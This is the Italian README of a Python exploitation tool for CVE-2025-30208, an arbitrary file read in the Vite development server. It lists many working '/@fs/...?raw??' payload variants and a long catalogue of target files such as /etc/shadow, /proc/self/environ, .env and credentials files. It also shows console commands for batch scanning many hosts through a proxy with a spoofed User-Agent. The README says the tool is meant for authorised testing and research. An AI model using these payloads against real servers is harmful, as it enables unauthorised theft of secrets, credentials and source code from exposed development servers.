
CVE‑2025‑30208 è una vulnerabilità di lettura arbitraria di file di media gravità nel server di sviluppo Vite (un popolare strumento di build frontend).
Scanner di vulnerabilità avanzato per CVE-2025-30208 con funzionalità di livello enterprise
Strumento professionale di penetration testing per il rilevamento della vulnerabilità di lettura arbitraria di file in Vite
🚀 Avvio Rapido • 📋 Caratteristiche • 🔧 Utilizzo • 📊 Esempi • 🛡️ Sicurezza
Questo è uno scanner di vulnerabilità completo progettato per rilevare e sfruttare la vulnerabilità CVE-2025-30208 nei server di sviluppo Vite. La vulnerabilità consente l'accesso alla lettura arbitraria di file attraverso gli endpoint del file system di Vite, esponendo potenzialmente file di configurazione sensibili, codice sorgente e informazioni di sistema.
Lo strumento ora presenta un'architettura modulare per una migliore manutenibilità ed estensibilità:
CVE-2025-30208.py - Applicazione scanner principalepayloads.py - Payload di sfruttamento avanzati (60+ varianti)sensitive_files.py - Database completo di file sensibili (200+ file)html_template.py - Template di reporting HTML in stile hacker miglioratopip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# Abilita la modalità verbose per output dettagliato
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Premere Invio due volte per terminare]
CVE-2025-30208 > scan
# Configura proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# Imposta header personalizzati
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# Configura limitazione della frequenza
CVE-2025-30208 > rate
Enter rate limit: 1.0
# Genera un bellissimo report HTML
CVE-2025-30208 > pull
# Avvia il server web per visualizzare il report
CVE-2025-30208 > web
# Avvia il server web su una porta specifica
CVE-2025-30208 > web 8081
# Arresta il server web
CVE-2025-30208 > web off
Lo scanner ora utilizza 60+ diverse varianti di payload organizzate in payloads.py:
/@fs/{percorso_file}?raw??
/@fs/{percorso_file}?raw&url
/@fs/{percorso_file}?import&raw??
/@fs/{percorso_file}?raw&import
/@fs/{percorso_file}?import&url
/@fs/{percorso_file}?raw&source
/@fs/{percorso_file}?raw&content
/@fs/{percorso_file}?raw&data
/@fs/{percorso_file}?raw&file
/@fs/{percorso_file}?raw&type=text
/@fs/{percorso_file}?raw&format=text
/@fs/{percorso_file}?raw&encoding=utf8
/@fs/{percorso_file}?raw&vite&dev
/@fs/{percorso_file}?raw&vite&hot
/@fs/{percorso_file}?raw&vite&hmr
/@fs/{percorso_file}?raw&development
/@fs/{percorso_file}?raw&debug
/@fs/{percorso_file}?raw&esm
/@fs/{percorso_file}?raw&cjs
/@fs/{percorso_file}?raw&umd
/@fs/{percorso_file}?raw&js
/@fs/{percorso_file}?raw&ts
/@fs/{percorso_file}?raw&json
/@fs/{percorso_file}?raw&css
/@fs/{percorso_file}?raw&html
/app/{percorso_file}?raw??
/App/{percorso_file}?raw??
Lo strumento ora testa 200+ file sensibili organizzati in sensitive_files.py:
/etc/passwd - Informazioni account utente/etc/shadow - Dati password crittografati/etc/services - Servizi di rete/etc/hosts - Mappature hostname/etc/fstab - Tabella del file system/etc/ssh/sshd_config - Configurazione server SSH/etc/crontab - Processi cron di sistema/etc/sudoers - Configurazione sudo/proc/version - Versione kernel/proc/cpuinfo - Informazioni CPU/proc/meminfo - Informazioni memoria/proc/self/environ - Ambiente processo/proc/self/cmdline - Linea di comando processo/proc/net/tcp - Connessioni TCP/proc/net/udp - Connessioni UDP.env - Variabili d'ambiente.env.local - Ambiente locale.env.production - Ambiente di produzioneconfig.json - Configurazione applicazionesettings.json - Impostazioni applicazioneapplication.properties - Configurazione Springapplication.yml - Configurazione YAMLdatabase.yml - Configurazione databasesecrets.json - Gestione segretipackage.json - Dipendenze Node.jspackage-lock.json - Dipendenze bloccateyarn.lock - File di blocco Yarnvite.config.js - Configurazione Vitevite.config.ts - Configurazione Vite TypeScripttsconfig.json - Configurazione TypeScriptwebpack.config.js - Configurazione Webpacknext.config.js - Configurazione Next.jsnuxt.config.js - Configurazione Nuxt.jsangular.json - Configurazione Angularvue.config.js - Configurazione Vue.jsrollup.config.js - Configurazione Rollupeslint.config.js - Configurazione ESLint.git/config - Configurazione Git.gitignore - Regole di ignoramento Git.gitattributes - Attributi Git.gitmodules - Sottomoduli Git.git/HEAD - Branch corrente.git/logs/HEAD - Log Git.git/refs/heads/master - Branch master.git/refs/heads/main - Branch mainREADME.md - Documentazione del progettoCHANGELOG.md - Registro modificheLICENSE - Informazioni licenzaCONTRIBUTING.md - Linee guida per contribuireAUTHORS - Informazioni autoriTODO.md - Elenco cose da fareROADMAP.md - Roadmap di sviluppoDockerfile - Configurazione Dockerdocker-compose.yml - Docker Composedocker-compose.override.yml - Configurazione override.dockerignore - Regole di ignoramento Dockerdocker-compose.prod.yml - Configurazione di produzionedocker-compose.dev.yml - Configurazione di svilupponginx.conf - Configurazione Nginxapache2.conf - Configurazione Apachehttpd.conf - Configurazione demone HTTP.htaccess - Controllo accesso Apacheweb.config - Configurazione IISrobots.txt - Direttive motori di ricercasitemap.xml - Struttura del sitomanifest.json - Manifest dell'app websw.js - Service workerfirebase.json - Configurazione Firebasefirebase.rules - Regole di sicurezza Firebaseboot.ini - Configurazione di avvioautoexec.bat - Script di esecuzione automaticasystem.ini - Configurazione di sistemawin.ini - Configurazione WindowsUsers - Directory utentiWindows - File di sistemaProgram Files - Directory applicazioniSystem - File di sistemaLibrary - File libreriaApplications - File applicazioniprivate/etc/hosts - File hostsprivate/etc/passwd - Account utentedatabase.db - Database SQLitedatabase.sqlite - Database SQLitedata.db - Database datidump.sql - Dump databaseschema.sql - Schema databasemigrations - Migrazioni databaselogs - Directory dei logerror.log - Log erroriaccess.log - Log accessiapp.log - Log applicatividebug.log - Log di debugcombined.log - Log combinatibackup - Directory di backupbackup.sql - Backup databasebackup.zip - Backup compressodump - Dump datiexport - Esportazione datiauth.json - Configurazione autenticazionecredentials.json - Archiviazione credenzialikeys.json - Gestione chiavitokens.json - Archiviazione tokenjwt.json - Configurazione JWToauth.json - Configurazione OAuthapi.json - Configurazione APIswagger.json - Documentazione APIopenapi.json - Specifica OpenAPIgraphql.json - Configurazione GraphQLschema.json - Schema APIcloudformation.yml - AWS CloudFormationserverless.yml - Configurazione Serverlessterraform.tf - Configurazione Terraformkubernetes.yml - Configurazione Kubernetesk8s.yml - Configurazione Kubernetesanalytics.json - Configurazione analisimonitoring.json - Impostazione monitoraggiometrics.json - Configurazione metrichetelemetry.json - Dati telemetriaLo strumento ora genera bellissimi report HTML in stile hacker con:
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan
CVE-2025-30208/
├── CVE-2025-30208.py # Applicazione scanner principale
├── payloads.py # Payload di sfruttamento avanzati (60+)
├── sensitive_files.py # Database di file sensibili (200+)
├── html_template.py # Template di reporting HTML migliorato
├── README.md # Questa documentazione
├── requirements.txt # Dipendenze Python
├── logs/ # Directory file di log
├── data_leak.html # Report HTML generati
├── data_leak.json # Report JSON generati
└── session.json # Configurazioni sessione salvate
Accogliamo con favore i contributi per migliorare questo strumento:
payloads.pysensitive_files.pyhtml_template.pyQuesto progetto è concesso in licenza per scopi educativi e di test di sicurezza autorizzati esclusivamente.
⚠️ Disclaimer Legale: Questo strumento è destinato esclusivamente a scopi di test di sicurezza autorizzati e ricerca. Gli utenti sono responsabili di assicurarsi di avere la corretta autorizzazione prima di testare qualsiasi sistema. Gli autori non sono responsabili per qualsiasi uso improprio di questo strumento.
⭐ Se questo strumento ti è stato utile, per favore lascia una stella! ⭐
Realizzato con ❤️ per la comunità della sicurezza
| Comando | Descrizione | Esempio |
|---|
set <opzione> <valore> | Imposta opzioni di configurazione | set RHOST 192.168.1.100 |
show options | Mostra le impostazioni correnti | show options |
edit | Editor interattivo delle opzioni | edit |
run / exploit | Esegui test di vulnerabilità | run |
batch | Scansione batch di più target | batch |
scan | Scopri file sensibili | scan |
pull | Esporta risultati in HTML/JSON | pull |
web [on|off|porta] | Server web per report HTML | web 8080 |
save | Salva configurazione sessione | save |
load | Carica configurazione sessione | load |
test | Testa la connettività al target | test |
validate | Valida la configurazione corrente | validate |
verbose | Attiva/disattiva modalità verbose | verbose |
proxy | Configura impostazioni proxy | proxy |
headers | Imposta header HTTP personalizzati | headers |
rate | Configura limitazione della frequenza | rate |
log | Mostra informazioni di log | log |
help / ? | Mostra aiuto | help |
exit / quit | Esci dallo strumento | exit |
| Opzione | Descrizione | Valore Predefinito | Validazione |
|---|
RHOST | Indirizzo host/IP target | - | Validazione hostname/IP |
RPORT | Numero porta target | - | Intervallo porte (1-65535) |
FILEPATH | Percorso file da testare | etc/passwd | Validazione percorso |
PROXY | URL proxy HTTP/HTTPS | - | Validazione formato URL |
VERBOSE | Abilita output verbose | false | Validazione booleana |
RATE_LIMIT | Ritardo tra richieste (secondi) | 0.3 | Validazione numerica |
THREADS | Numero di thread per scansione batch | 5 | Validazione intera |
TIMEOUT | Timeout richiesta (secondi) | 5 | Validazione intera |
CUSTOM_HEADERS | Header HTTP personalizzati (JSON) | {} | Validazione formato JSON |
prettier.config.js - Configurazione Prettierjest.config.js - Configurazione Jestbabel.config.js - Configurazione Babeltailwind.config.js - Configurazione Tailwind CSS| File | Descrizione | Formato |
|---|
data_leak.html | Report di vulnerabilità HTML in stile hacker migliorato | HTML |
data_leak.json | Esportazione JSON strutturata | JSON |
sensitive_files_discovery.json | File sensibili scoperti | JSON |
session.json | Configurazione sessione salvata | JSON |
logs/cve_2025_30208_YYYYMMDD_HHMMSS.log | Log di audit dettagliati | Testo |